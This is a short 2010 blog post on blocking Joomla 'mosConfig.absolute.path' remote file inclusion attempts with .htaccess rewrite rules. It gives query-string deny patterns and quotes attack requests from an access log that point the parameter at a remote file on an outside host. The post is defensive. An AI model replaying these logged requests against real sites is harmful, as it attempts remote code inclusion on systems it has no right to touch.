This site is support & information site of WEB,and Software. This site might help you that create software or Web Site…perhaps?[:]

Block mosConfig.absolute.path attack

Published on| May 10th, 2010 | No Comment.
Recently, I have seen "confirm mosConfig.absolute.path attack" on my site by Joomla!.
Then, I felt the necessity for taking some measures.
So this post might help you that have same problem.

Edit .htaccess

This post will explain how to block the attack by an easy .htaccess edit.

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

You will find the sentence like the above-mentioned to the htaccess file. You will add the following lines under above-line.

RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]
RewriteCond %{QUERY_STRING} .*mosconfig.* [OR]
RewriteCond %{QUERY_STRING} .*http:.* [OR]
It is very easy. But you should note at 3 line.
This line means the error is displayed when the character string "http:" is included in the parameter of URL.
You should become careful a plug-in parameter etc.

And, you should confirm the access log. If you were able to find the following access logs, your site might be attacked. - - [27/Apr/2010:02:38:33 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0" - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_content&view=...40:extemtions&directory=1%20%20//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 42653 "-" "Mozilla/5.0" - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0" - - [27/Apr/2010:02:38:35 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41811 "-" "Mozilla/5.0"


Leave a Reply

  • はてなブックマークへ追加する
  • Facebookでシェアする
  • twitter でつぶやく
  • Google Plusでシェアする
  • Pocketでシェアする